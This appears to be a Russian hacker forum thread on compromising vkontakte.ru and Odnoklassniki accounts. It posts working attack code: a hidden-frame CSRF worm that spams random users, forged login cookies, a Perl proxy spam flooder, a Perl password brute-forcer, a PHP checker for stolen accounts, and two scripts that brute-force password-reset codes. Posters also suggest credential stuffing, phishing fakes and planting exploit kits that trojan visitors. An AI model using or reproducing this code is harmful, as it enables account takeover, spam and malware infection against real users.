Перейти к содержимому

 Друзья: Всё для вебмастера | [ Реклама на форуме ]


Rutor
Rutor


[ DDos Услуги. DDos атака. Заказать ДДос ]


vkontakte.ru


Сообщений в теме: 36

#1
###

###

    Экзабайт

  • Advanced
  • PipPipPipPipPipPip
  • 1743 сообщений
Кто-нить пробовал ломать?

Ссылки из под хайдов не выдаю!


#2
AFoST

AFoST

    тапочег с вишней

  • Moderator
  • PipPip
  • 256 сообщений
Нашли xss в быстром поиске. В панели друзей что ли...А остальное, я так понимаю, можно найти только в привате :(

#3
113

113

    Байт

  • Members
  • Pip
  • 60 сообщений
не ломал,но знаю что ломали профили, группы...

#4
$iD

$iD

    Админ

  • root
  • PipPipPipPipPipPip
  • 3785 сообщений
Нашел в нете вот такую интересную инфу ))

Хотите посмотреть закрытый профиль? Нет проблем!
Для начала узнаем ID человека. Наводим мышкой на кнопку "Друзья Иванова Ивана" и видим что-то на подобие:
]]>http://vkontakt.ru/f...ct=add&id=77777]]> где последние цифры и есть ID. Далее вставляем этот ID (вместо 77777) в следующие строки:

Фотографии со мной:
]]>http://vkontakte.ru/...t=user&id=77777]]>
Фотоальбомы:
]]>http://vkontakte.ru/...os.php?id=77777]]>
Видеозаписи:
]]>http://vkontakte.ru/video.php?id=77777]]>
Заметки:
]]>http://vkontakte.ru/notes.php?id=77777]]>

При этом можно даже оставлять комментарии

Хотите вставлять вместо граффити свои картиники? Это просто!
Web-сервис: ]]>http://zilmar.com/vi...e.php?page_id=4]]> (картинка должна быть в формате jpg)
Web-сервис: ]]>http://www.polus.com.ru/vkontakte.php]]> (картинка должна в формате png)

Фотографии не увеличиваются? Это разрешимо!
Если ввиду условий приватности увеличение изображения не допустимо, копируем ссылку на изображение
(на подобие ]]>http://cs52.vkontakt...1f77909fуf.jpg)]]>,
далее меняем букву перед знаком "_" на x (получим ]]>http://cs52.vkontakt....1f77909fуf.jpg]]>)

by librarian - 0day.kiev

#5
AFoST

AFoST

    тапочег с вишней

  • Moderator
  • PipPip
  • 256 сообщений
У меня только фотоальбом получилось так посмотреть! Но всё равно это уже лучше, чем ничего :)

#6
$iD

$iD

    Админ

  • root
  • PipPipPipPipPipPip
  • 3785 сообщений
Интро

Привет, котятки! Сегодня мы попробуем заняться паразитизмом на довольно крупном сервисе vkontakte.ru. Сервис страдает от огромного количества всевозможных проблем с безопасностью и просто багов.
Рассмотрим пару самых занятных багов, может быть, напишем флудер/спаммер.

1. Занимательный javascript

В связи с тем, что изначально формы отправки сообщений и комментариев были ничем не защищены, то был получен довольно забавный опыт саморассылающегося спама. Это и по сей день остаётся актуальным, ибо часть скриптов по-прежнему не защищена.

Итак, рассмотрим, к примеру, скрипт отправки личных сообщений. Вообще, изначально пользователи взаимодействуют с ним посредством метода POST, но в самом скрипте метод не проверяется (то ли используется суперглобальный массив $_REQUEST, то ли register_globals=on).
Примечание: метод не имеет значения, просто метод GET несколько упрощает скрипт, о методе POST будет сказано ниже.

Чтобы отправить сообщение достаточно перейти по ссылке: ]]>http://vkontakte.ru/...p;message=Hello]]>.
Сообщение будет отправленно в случае наличия куки. Собстсвенно, в этом и состоит идея - написать скрипт, который будет открывать эту ссылку в скрытом фрейме, рассылая наши сообщения.

Создадим три страницы:
1) index.html
<frameset ROWS="100%,0%,0%"> 
<FRAME NAME="mainfrm" SRC="http://www.183.ru/2/"> 
<FRAME NAME="preved" SRC="preved.html"> 
<FRAME NAME="timer" SRC="timer.html"> 
</frameset>
2) preved.html
<html><head></head><body></body></html>
3) timer.html
<head> <script> function timer() { var msg = new String(); var msg_to; do { msg_to=Math.ceil(Math.random()*1000000); } while (msg_to.value>1100000); // генерируем случайный id получателя msg=urlencode('Превед!'); // наше сообщение 8) msg+='%0a'+parent.location; // добавим к сообщению ссылку на сайт, на котором мы расположены // отправим наше сообщение parent.preved.document.location="http://vkontakte.ru/mail.php?act=sent&to_id="+msg_to+"&title=
&message="+msg; setTimeout("timer()", 1250); // И поставим сами себя на таймер } </script> </head> <body> <script> timer(); </script> </body>
Таким образом, скрипт во фрейме timer будет постоянно слать сообщения, используя фрейм preved, а фрейм mainfrm служит для отвода глаз.

Что делать, если скрипт поддерживает только метод POST? В этом случае нужно создать форму для отправки данных скрипту на сервере, и написать скрипт для отправки формы, вызывающий метод submit: document.our_form.submit();

Пример сего чуда в действии можно посмотреть тут: ]]>http://l-0-v-e.by.ru]]>
Когда я опробовал это в действии, счётчик на странице насчитал 17400 человек, сходивших по ссылке. Не очень много, но всё же.
Сие милое развлечение было окрещено пользователями "вирусом".
"Какая же от этого практическая польза?" - спросите вы. Понавешайте на страницу илитных зиродей сплоетов, троянящих каждого зашедшего, и польза будет 8)

2. Проблемы с безопасностью

В куке не проверяется e-mail. Единственное условие - переменная remixemail должна быть непустой. Что, собственно, это нам даёт? Рассмотрим пример: посмотрим, скажем, на пользователя ]]>http://vkontakte.ru/profile.php?id=196]]>. Замечательный пользователь. Взглянем на дату рождения - 05.01.1984. Захешируем стоку "05011984" алгоритмом md5, получим a99fa18a6d54dfda21c15fa3f5fe2aac. Составим куку вручную:

remixmid=196; remixemail=bill_gates%40microsoft.com; remixpassword=a99fa18a6d54dfda21c15fa3f5fe2aac;

Откроем страницу vkontakte.ru и - оп! - мы пользователь с id=196. Не хватает только адреса почты. Раньше его можно было посмотреть на странице настроек, но теперь это дело прикрыли. Тем не менее, если он нужен, то его можно получить при попытке смены почты - на оба ящика придёт письмо с указанием обоих адресов. Не красиво, ибо жертва его тоже получит, но если пароль подойдёт к мыльнику - можно будет его удалить.

3. Многопоточный флудер

Ну и коль мы нахекали целую гору аккаунтов, отчего б не написать спаммер заметок.
How to use: аккаунты в accs.txt, прокси в proxies.txt. Для отправки каждого сообщения fork-ом создаётся потомок нашего процесса, если он живёт слишком долго - убивается. Под разными системами по-разному, на некоторых после завершения родительского процесса могут оставаться детишки-зомби 8)
#!/usr/bin/perl

#
# By lord_of_keyboard, 2007.
#

use IO::Socket;
use Digest::MD5 qw (md5_hex);

sub add_child {
	my $proxy=shift;
	my $acc=shift;
	my $pid = fork();
	if ($pid) { # parent
		push(@children, $pid.":".time());
	} elsif ($pid == 0) { # child
		$proxy=~s/[\r\n ]//g; $acc=~s/[\r\n ]//g;
		my ($host, $port) = split(":",$proxy);
		my ($id, $password, $shit) = split(":", $acc);
		my $cookie="remixmid=$id; remixemail=bill_gates%40microsoft.com; remixpass=".md5_hex($password);
		my $post_id=int(rand(400000));		
		my $text = "Я тебя люблю ";

		for $i (1..int(rand(10)+1)){ $text.=")"; }
		$text.="\n http://l-0-v-e.by.ru/";
		$text =~s/([^A-Za-z0-9])/sprintf("%%%02X", ord($1))/seg;
		
		my $get = "GET http://vkontakte.ru/notes.php?act=s&nid=$post_id HTTP/1.0\r\n".
			"Host: vkontakte.ru\r\n".
			"Accept: */*\r\n".
			"Content-Type: application/x-www-form-urlencoded\r\n".
			"Referer: http://vkontakte.ru/\r\n".
			"User-Agent: Internet Explorer 6.0\r\n".
			"Cookie: $cookie\r\n".
			"Connection: close\r\n\r\n";
	
		my $sock = IO::Socket::INET->new(Proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
		print $sock $get;
		while ($html = <$sock>){
			if ($html =~ /name="blog_id"/gi){
				$html=~m/(\d+)/gi;
				$blog_id = $1;
			}
		}
		close $sock;
		sleep(1);

		$request = "blog_id=$blog_id&post_id=$post_id&act=addComment&comment=$text";
		$comment = "POST http://vkontakte.ru/notes.php HTTP/1.1\r\n".
			"Host: vkontakte.ru\r\n".
			"Accept: */*\r\n".
			"Content-Type: application/x-www-form-urlencoded\r\n".
			"Content-Length: ".length($request)."\r\n".
			"Referer: http://vkontakte.ru/\r\n".
			"User-Agent: Internet Explorer 6.0\r\n".
			"Cookie: $cookie\r\n".
			"Connection: close\r\n\r\n$request";
		my $sock = IO::Socket::INET->new(Proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
	
		print $sock $comment;
		while (<$sock>){ print; }
		close $sock;

		exit(0); # bailing out 8)
	} else {
		die "couldn't fork: $!\n";
	}
}

sub next_plz {
	$proxy_offset++; $acc_offset++;
	if ($proxy_offset>$#{@proxies}){ $proxy_offset=0; }
	if ($acc_offset>$#{@accs}){ $acc_offset=0; }
}

print "Hello, master. I am ready to serve you.\n\n";

open(FILE,"<proxies.txt"); @proxies=<FILE>; close FILE;
open(FILE,"<accs.txt");	@accs=<FILE>;	close FILE;

@children=(); $acc_offset=0; $proxy_offset=0;
for my $i (1..10) { add_child(@proxies[$proxy_offset], @accs[$acc_offset]); next_plz; }

while (1){
	print "There are ".(@children)." of us.\n";
	for my $i (0..$#{@children}) {
		my $child=@children[$i];
		my ($pid,$time)=split(":",$child);
		my $status = waitpid($pid, -1);
		if ($status>=0) {
			if (time()-$time>30) {
				kill($pid); # time has come to die, r.i.p.
			} # if
		} else {
		splice(@children,$i,1);
		add_child(@proxies[$proxy_offset], @accs[$acc_offset]); next_plz; 
		}
	} # foreach
sleep(2);
}
Заключение

Всё написанное выше - не более, чем описание некоторого опыта. Может кому-то пригодится, может, возможно использовать где-то ещё.
By C!klodoL & lord_of_keyboard, 2007.

#7
$iD

$iD

    Админ

  • root
  • PipPipPipPipPipPip
  • 3785 сообщений
Брут для vkontakte.ru ;) Написан на перле, ну в принципе все по коду видно...
Скрытый текст
!/usr/bin/perl

use IO::Socket;
use MD5;
use threads;
use threads::shared;
my @pass : shared;

######################################
# C!klodoL
# vkontakte.ru bruteforce with multi-threads
######################################
$dic = 'passl.txt';  #словарь паролей
$id = 111111;  #id цели
$mail = 'mail%40mail.com'; #мыло, вместо @ вписать %40
$threads = 4;  #количество потоков
######################################

zyWY (pass, "<$dic");

Next:
@pass = pass();

for(0..$threads) {$trl[$_] = threads->create(\&Brut, $_);}
for(@trl) { $_->join; }

sub Brut
{

while (@pass){

$pass = shift @pass;

$md5 = MD5->hexhash($pass);
$sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPort=>80);
print $sock "HEAD ]]>http://vkontakte.ru/]]> HTTP/1.0\r\n".
"Host: vkontakte.ru\r\n".
           "Accept: */*\r\n".
           "Content-Type: application/x-www-form-urlencoded\r\n".
           "User-Agent: Mozillo\r\n".
           "Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n".
           "Connection: close\r\n\r\n";
$answ = <$sock>;
close $sock;
print "$pass  $answ";
if ($answ =~ /302/){
zyWY (good, '>>good.txt');
print good "$id:$pass:$md5\n";
print "$id:$pass:$md5\n";
close good;
exit;}
}

}

goto Next;

sub pass
{
my (@mas);
while (<pass>){
push @mas, $_;
last if (@mas == 400);
}
chomp @mas;
return @mas;
}

Скрытый текст
$dic = 'passl.txt'; #словарь паролей
$id = 111111; #id цели
$mail = 'mail%40mail.com'; #мыло, вместо @ вписать %40
$threads = 4; #количество потоков


#8
113

113

    Байт

  • Members
  • Pip
  • 60 сообщений
а как можно узнать по ID почтовый ящик, под которым регался юзер? может кто знает...

#9
attacking_xxx

attacking_xxx

    Бит

  • Members
  • 23 сообщений
Я нашел альтернативный но не 100% способ! Обычно он работет! --->

Как известно у юзера 1 почтовый ящик на все.... схема проста!
Узнаешь номер ICQ -> В ICQ узнаешь mail -> Подбираешь к "Вконтакте"

Пример:
id - 35196
icq - 201785054
email - sergejosennij@yandex.ru
pass - venera

:whistling: самое интерестное и Вконтакте все подошло....

в ~20% процентах работает!!!

#10
attacking_xxx

attacking_xxx

    Бит

  • Members
  • 23 сообщений
CSRF атака на vkontakte.ru
13 марта, 2008

Программа: vkontakte.ru

Опасность: Низкая

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение.

Уязвимость существует из-за недостаточной проверки подлинности HTTP запросов при выполнении некоторых действий. Удаленный пользователь может с помощью специально сформированного Web сайта изменить адрес личной Web страницы, загрузить произвольные фотографии в альбом, открыть/закрыть доступ к фотоальбому и другое. Пример:

]]>http://vkontakte.ru/...http://site.com]]>

URL производителя: vkontakte.ru

Решение: Способов устранения уязвимости не существует в настоящее время.

URL адреса:  

]]>http://habrahabr.ru/...bdev/37556.html]]>

sECURITY LAB

#11
hellp123

hellp123

    Бит

  • Members
  • 2 сообщений
кстати вро де как была пасивка в фотоальбоме

#12
Sinoptik

Sinoptik

    Бит

  • Members
  • 8 сообщений
а есть где фейк-страница вконтакте?

#13
Spark_01

Spark_01

    Бит

  • Members
  • 16 сообщений
Sinoptik, вот тема про ]]>фейки]]>. Там найдёшь то, что тебе надо.

#14
rojig

rojig

    Бит

  • Members
  • 7 сообщений
много дыр а толку мало!

#15
AFoST

AFoST

    тапочег с вишней

  • Moderator
  • PipPip
  • 256 сообщений
В популярной социальной сети ВКонтакте.ру, в сервисе Приложения, обнаружена XSS-уязвимость.

Она заключается в том, что в исходный код флэшки можно внедрить javascript, который при прямом доступе к флэшке исполнится, как и в IE, так и в Firefox'е. Это, конечно, разработчиками ВКонтакте учтено: прямой доступ к флэшке запрещен. Но флэшка сохраняется в кэше браузера, откуда ее можно загрузить без проблем.

На этом основан proof-of-concept. Когда флэшка сохранилась в кэше браузера, то она может открыть новое окно с ссылкой на себя, браузер ее загрузит из кэша - и javascript выполнится.

Единственное, что спасает, - это блокировщик всплывающих окон. Но обычные пользователи, видя, что открывает его ВКонтакт, блокировку снимут. Работоспособность во всех браузерах не гарантирована, проверялось на IE6 и FF3RC1.

]]>ТЕСТ]]> (новое окно открывается через 2 секунды)

(с) habrahabr.ru


PS реально работает :crazy:

#16
DrShaman

DrShaman

    Бит

  • Members
  • 1 сообщений
Понатыкают щас пинчей)

#17
###

###

    Экзабайт

  • Advanced
  • PipPipPipPipPipPip
  • 1743 сообщений

[ VKontakte checker ]



Наверно самый простой чекер для vkontakte.ru, он проверяет аккаунты на валидность и положительный результат записывает в файл.

Список аккаунтов должен находиться в accounts.txt
Результат будет в good.txt
Отделение от почты и пароля точка с запятой
<?php  
#&-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|  
#&-------------------------------  
#&	 ВКонтакте АККчекер	0.1  
#&	 VKontakte ACCchecker  0.1  
#&	 By NNNS::[icq: 474374]   
#&	 All lefts reserved.  
#&-------------------------------  
#&-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|  

# Отключаем ограничение на время выполнения скрипта  
set_time_limit(0);  
# User Agent  
$user_agent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.12";   
# Файл с аккаунтами  
$acclist = "accounts.txt";  
# Файл с валидными аккаунтами  
$vallist = "valid.txt";  
# Помещаем аккаунты в массив  
$account = file($acclist);  
# Рабочие аккаунты  
$valid   = 0;  
# Нерабочие аккаунты  
$invalid = 0;  

function vkCheck($email,$pass) {   
	# Открываем сокет  
	$fp=fsockopen("vkontakte.ru",80,$errno,$errstr,10);   
	# Отправляем заголовки  
	$out = "GET /login.php?email=".$email."&pass=".$pass." HTTP/1.0\r\n";   
	$out .= "Host: vkontakte.ru\r\n";   
	$out .= "User-Agent: ".$user_agent."\r\n";   
	$out .= "Cookie: income=1\r\n";   
	$out .= "Content-Type:text/xml; charset=windows-1251\r\n\r\n";   
	fwrite($fp,$out);   
	# Записываем ответ сервера в переменную  
	$ans=fgets($fp,128);   
	# Закрываем сокет  
	fclose($fp);   
	# Если 302 найден, значит акк валидный  
	if(preg_match("/\b302 Found\b/is", $ans)) {  
		return true;  
	} else {  
		return false;  
	}  
}  
# Запускаем цикл  
for($i=0;$i<count($account);$i++) {  
	# Удаляем симолы перевода строки  
	$caccaunt		  = str_replace("\r\n","",$account[$i]);  
	# Разбиваем на e-mail и пароль  
	list($email,$pass) = explode(";",$caccaunt);  
	# Вызываем функцию проверки аккаунта  
	$answer			= vkCheck($email,$pass);  
	# Если аккаунт рабочий, записываем его в файл  
	if ($answer == true) {  
		$fd = fopen($vallist,"a+");  
		fputs($fd,$account[$i]);  
		fclose($fd);  
		$valid++;  
	} else {  
		$invalid++;	  
	}  
}  
# Выводим результат  
echo "Рабочих аккаунтов: ".$valid."<br>Нерабочих аккаутов: ".$invalid;  
?>

Ссылки из под хайдов не выдаю!


#18
DarckSol

DarckSol

    Байт

  • Extended
  • Pip
  • 95 сообщений
Это брут сплоит под ОДНОКЛАСНЕКИ, но двиги почти одинаковы, так что может и тут прокатит, сам не пробывал, мало интересно, но может комуто захочется поигратся:
Сплойт 1
#!/usr/bin/perl
use LWP::UserAgent;
 
print qq(
   ,__					__,					   
						/ /					 
		  __	  _	/ /					  
		 .___/:::* / /						 
		  |_____  |/						   
		 /<>//,./	  /	   _________							 
		/	  /	  /	  |  RST				 
	   /	  /.,<>/	  |   GHC					   
				 /'  \\  /   |	UKT
		\\	  \\  /	 \\	 |__\\xD____						 
		 \\	  \\/	  /						   
	   /  '''''	  /							   
	/ /			 /						   
   / /		 ___  /						   
   *__					__*
			   [preved odnoklassne4gi]
				 
);
 
 
 
if (!scalar(@ARGV)) {
	print "\[~\]Usage : ./$0 eMail {number of child procs}\n\n";
	exit();
}
if (-e "success") {
	print "\[-\] File \"success\" exists in your directory. Please rename it or remove.\n\n";
	exit();	
}
 
my $email="$ARGV[0]";
 
if ($ARGV[1]) {
	my $MAX_PROCESSES=$ARGV[1];
} else {
	my $MAX_PROCESSES=5;
}
my $DEBUG=0;
 
my @pids;
my $npids=0;
my $restore=0;
my $e;
 
# first step - omg! I lost my password?!?!?!
$ua=LWP::UserAgent->new();
$page=$ua->post("http://odnoklassniki.ru/cdk/st.cmd/password/tkn/6544",["st.email"=>$email,"st.posted"=>"set"]);
$page_content=$page->content();
if ($page_content=~/st.email/) {
	print "\[-\] Please provide correct email address\n";
	exit();
} else {
	print "\[+\] Repair password code send to $email\n";
}
 
# step number two - bruteforce code for repair password
print "\[~\] Brutforce code for repair password\
This process make take max ~ 18 hours to check all combinations\
You need good internet channel and fast cpu\n";
open(LOG_FILE,">>log");
$not=1;
for ($code=100000;$code<=999999;$code++) {
	if (-e "success") {
		print "DONE";
		exit();
	}
	if ($code==199999 && $not==1) {
		$cod="099999";
		$not=0;
		$code=100000;
	} elsif ($code=~/^1(d+)$/ && $not==1) {
		$code=~/^1(d+)$/;
		$cod="0$1";
	} else {
		$cod=$code;
	}
	if ($cod=~/^(d+)000$/) {
		print "#";
	}
 
	my $pid;
	$pid=fork();
	if($pid>0){
	 push(@pids,$pid);
	 $npids++;
	 if($npids>=$MAX_PROCESSES){
		 for(1..($MAX_PROCESSES)){
		  $wait_ret=wait();
		  if($wait_ret>0){
					$npids--;
				}
			}
		}
		next;
	}elsif(undef $pid){
		print "fork error\n" if ($DEBUG);
		exit(0);
	}
	$p=$ua->post("http://www.odnoklassniki.ru/dk",["st.cmd"=>"passwordReset","st.email"=>$email,"st.confirmation-code"=>$cod,"st.posted"=>"set"]);
	$con=$p->content();
	if ($con=~/password.confirmation/) {
		print "$cod cached\n";
		print LOG_FILE "$cod cached\n";
		open(SUCCESS,">>success");
		print SUCCESS "\n############################\n";
		print SUCCESS "Yahooo! Congratulations! Code for password repair is - $cod\n";
		print SUCCESS "Go to http://www.odnoklassniki.ru//dk?st.cmd=passwordReset\n";
		print SUCCESS "Type your email ($email), your repair code ($cod) and set new password for your account.\n";
		print SUCCESS "############################\n";
		print "############################\n";
		print "Yahooo! Congratulations! Code for password repair is - $cod\n";
		print "Go to http://www.odnoklassniki.ru//dk?st.cmd=passwordReset\n";
		print "Type your email ($email), your repair code ($cod) and set new password for your account.\n";
		print "############################\n";
		close(SUCCESS);
	} else {
		print LOG_FILE "$cod failed\n";
	}
	exit();
}
close(LOG_FILE);
И более новая версия:
Слойт 2
#!/usr/bin/perl
use LWP::UserAgent;
use strict;
print qq(
   ,__					__,					   
						/ /					 
		  __	  _	/ /					  
		 .___/:::* / /						 
		  |_____  |/						   
		 /<>//,./	  /	   _________							 
		/	  /	  /	  |  RST				 
	   /	  /.,<>/	  |   GHC					   
				 /'  \\  /   |	UKT
		\\	  \\  /	 \\	 |__\\xD____						 
		 \\	  \\/	  /						   
	   /  '''''	  /							   
	/ /			 /						   
   / /		 ___  /						   
   *__					__*
					 [preved odnoklassne4gi]
					   
);
 
 
 
if (!scalar(@ARGV)) {
	print "\[~\]Usage : ./$0 eMail {number of child procs}\n\n";
	exit();
}
if (-e "success") {
	print "\[-\] File \"success\" exists in your directory. Please rename it or remove.\n\n";
	exit();	
}
my($email,$MAX_PROCESSES,$DEBUG,@pids,$npids,$ua,$page,$page_content,$not,$code,$cod,$p,$con,$wait_ret); 
 
$email="$ARGV[0]";
 
if ($ARGV[1]) {
	$MAX_PROCESSES=$ARGV[1];
} else {
	$MAX_PROCESSES=5;
}
$DEBUG=0;
 
@pids;
$npids=0;
 
# first step - omg! I lost my password?!?!?!
$ua=LWP::UserAgent->new();
$page=$ua->post("http://odnoklassniki.ru/cdk/st.cmd/password/tkn/6544",["st.email"=>$email,"st.posted"=>"set"]);
$page_content=$page->content();
if ($page_content=~/st.email/) {
	print "\[-\] Please provide correct email address\n";
	exit();
} else {
	print "\[+\] Repair password code send to $email\n";
}
 
# step number two - bruteforce code for repair password
print "\[~\] Brutforce code for repair password\
This process make take max ~ 18 hours to check all combinations\
You need good internet channel and fast cpu\n";
open(LOG_FILE,">>log");
$not=1;
for ($code=100000;$code<=999999;$code++) {
	if (-e "success") {
		print "DONE";
		exit();
	}
	if ($code==199999 && $not==1) {
		$cod="099999";
		$not=0;
		$code=100000;
	} elsif ($code=~/^1(d+)$/ && $not==1) {
		$code=~/^1(d+)$/;
		$cod="0$1";
	} else {
		$cod=$code;
	}
	if ($cod=~/^(d+)000$/) {
		print "#";
	}
 
	my $pid;
	$pid=fork();
	if($pid>0){
		push(@pids,$pid);
		$npids++;
		if($npids>=$MAX_PROCESSES){
			for(1..($MAX_PROCESSES)){
				$wait_ret=wait();
				if($wait_ret>0){
					$npids--;
				}
			}
		}
		next;
	}elsif(undef $pid){
		print "fork error\n" if ($DEBUG);
		exit(0);
	}
	$p=$ua->post("http://www.odnoklassniki.ru/dk",["st.cmd"=>"passwordReset","st.email"=>$email,"st.confirmation-code"=>$cod,"st.posted"=>"set"]);
	$con=$p->content();
	if ($con=~/password.confirmation/) {
		print "$cod cached\n";
		print LOG_FILE "$cod cached\n";
		open(SUCCESS,">>success");
		print SUCCESS "\n############################\n";
		print SUCCESS "Yahooo! Congratulations! Code for password repair is - $cod\n";
		print SUCCESS "Go to http://www.odnoklassniki.ru//dk?st.cmd=passwordReset\n";
		print SUCCESS "Type your email ($email), your repair code ($cod) and set new password for your account.\n";
		print SUCCESS "############################\n";
		print "############################\n";
		print "Yahooo! Congratulations! Code for password repair is - $cod\n";
		print "Go to http://www.odnoklassniki.ru//dk?st.cmd=passwordReset\n";
		print "Type your email ($email), your repair code ($cod) and set new password for your account.\n";
		print "############################\n";
		close(SUCCESS);
	} else {
		print LOG_FILE "$cod failed\n";
	}
	exit();
}
close(LOG_FILE);
Авторы сплоитов тима RST...
Купи VDS за 150 рублей в месяц.
Продаю ключи активация от продуктов Microsoft ©
Важно: Проводя сделку  УБЕДИСЬ в чистоте своего партнера/собеседника на причастие к "КИДАЛОВО/ОБМАНУ"
..:ICQ 335~949~335:..
<<Jabber: [email protected]<script data-cfhash='f9e31' type="text/javascript">/* */</script>, [email protected]>>

Изображение

#19
Invasion

Invasion

    Бит

  • Members
  • 26 сообщений
Хех, Павел Дуров растроится )

#20
HolyWanderer

HolyWanderer

    Бит

  • Members
  • 49 сообщений
Помогите пожалуйста, добрые люди!
вконтакте, как я понял, взломали мой акк и с него рассылают спам.
ЧТО МНЕ ДЕЛАТЬ?
дайте какие-то советы(кроме смены пароля)

#21
$iD

$iD

    Админ

  • root
  • PipPipPipPipPipPip
  • 3785 сообщений
HolyWanderer
Пароль смени и все ;)
-- Только не ставь пасс типа: 12345, qwerty, или там твое имя/фамилия... а такой чтоб были сочетались спец символы("№;%:?*), буквы в верхнем (H) и нижнем(h) регистрах и цифры...

p.s. Да, и проверь комп на вирусы, может тебе трояна подсунули ;)

#22
you

you

    Бит

  • Members
  • 1 сообщений
парни! вы мне скажите что со скриптом спама делать, када создаш эти три html страницы?куда их пихать?

#23
oler117

oler117

    Бит

  • Members
  • 34 сообщений
Хочу зайти по другой учетной записью на вконтакте... Пробывал метод, описанный $iD  в пункте 2,но ничего не получается... А разьве ключ "remixpass" должен содержать дату рождения, не пароль? ПОСОВЕТУЙТЕ ЧТО-ЛИБО ПО ЄТОЙ ТЕМЕ!

#24
###

###

    Экзабайт

  • Advanced
  • PipPipPipPipPipPip
  • 1743 сообщений
Билдер фэйка вконтакта:

Ссылки из под хайдов не выдаю!


#25
###

###

    Экзабайт

  • Advanced
  • PipPipPipPipPipPip
  • 1743 сообщений
Спамер для соц. сети vkontakte.ru
потдерживает проксики, спамит по группам, па аккам...

[Возможности]
-Рассылка по друзьям аккаунта
-Ротация сообщений
-Ротация тем
-Возможность подставления имен, тегами [name] и [lastname]
-Возможность установки задержки
-Возможность установки прокси
-Логирование неудачных отправок собщений
-Ajax
-Открытый исходный код
-Для работы требует наличия cURL.


Ссылки из под хайдов не выдаю!




Ответить



  

Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных